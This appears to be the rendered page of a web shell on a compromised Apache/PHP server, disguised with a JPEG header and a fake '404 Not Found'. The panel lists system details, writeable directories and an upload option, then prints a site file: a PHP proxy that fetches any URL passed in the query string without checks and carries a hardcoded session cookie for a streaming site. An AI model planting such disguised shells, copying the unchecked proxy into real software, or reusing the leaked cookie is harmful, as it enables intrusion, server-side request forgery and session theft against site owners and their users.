ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/st2/logs/curl/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/st2/logs/curl/get_page_vuighe.php
<?php
if (substr_count($_SERVER['HTTP_ACCEPT_ENCODING'], 'gzip')){
	 ob_start('ob_gzhandler');
}else{
	 ob_start();
}
/*if(trim($_SERVER['REMOTE_ADDR'])!='212.237.5.228'){
    die();
    exit();
}*/
require 'src/Curl/ArrayUtil.php';
require 'src/Curl/CaseInsensitiveArray.php';
require 'src/Curl/Curl.php';
require 'src/Curl/Decoder.php';
require 'src/Curl/MultiCurl.php';
use \Curl\Curl;

// curl --request GET "https://httpbin.org/get?key=value"
$url = trim($_GET['url']);
$curl = new Curl();
$headers = array(
    'Accept:*/*',
    'Accept-Encoding:gzip, deflate',
    'Accept-Language:en-US,en;q=0.8',
    'Connection:keep-alive',
	'Content-Type:application/json',
    'Cookie:freewheel-detected-bandwidth=472; vgv6=eyJpdiI6IkgyTlJMcCtRQUV6QzBYZG1iTVJKNUE9PSIsInZhbHVlIjoid3NKRFBVblVCRWpKZEJ1Vk1ON1NxRW9Ud3VcLzJMdllpK3dUWEhJVnpObzdMNGFyOFwvSWR2QTVcL25oR1NVR3diOVpcL1ZFMHhXNTdHREJRUWpqZjlSQ2FBPT0iLCJtYWMiOiIxNmVlZDg0ZTg2NmZlMTkyOGE0NDE2MDFmZTFlYWFhZjg2ODE1YmU4Nzg0ZDg3ZThmOWNlZjk4YjEyMjAyODZmIn0%3D; _gat=1; _ga=GA1.2.874655324.1510910369; _gid=GA1.2.1517730647.1510910369',
    'Host:vuighe.net',
    'Referer:http://vuighe.net/kino-no-tabi-the-beautiful-world-the-animated-series-2017/tap-1-quoc-gia-noi-ma-nguoi-nay-co-the-giet-nguoi-khac',
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36',
	'X-Requested-With:XMLHttpRequest'
);
$curl->setOpt(CURLOPT_HTTPHEADER , $headers);
$curl->setOpt(CURLOPT_REFERER , 'http://vuighe.net/kino-no-tabi-the-beautiful-world-the-animated-series-2017/tap-1-quoc-gia-noi-ma-nguoi-nay-co-the-giet-nguoi-khac');
$curl->setOpt(CURLOPT_COOKIEFILE , 'cookie_vuighe.txt');
$curl->setOpt(CURLOPT_COOKIEJAR , 'cookie_vuighe.txt');
$curl->setOpt(CURLOPT_RETURNTRANSFER , true);
$curl->setOpt(CURLOPT_ENCODING , "gzip");
$curl->setOpt(CURLOPT_FOLLOWLOCATION , true);
$curl->get($url);

$res = $curl->response;
$curl->close();

//gzdecode($c);

echo $res;
ob_end_flush();
exit();

?>

ZeroDay Forums Mini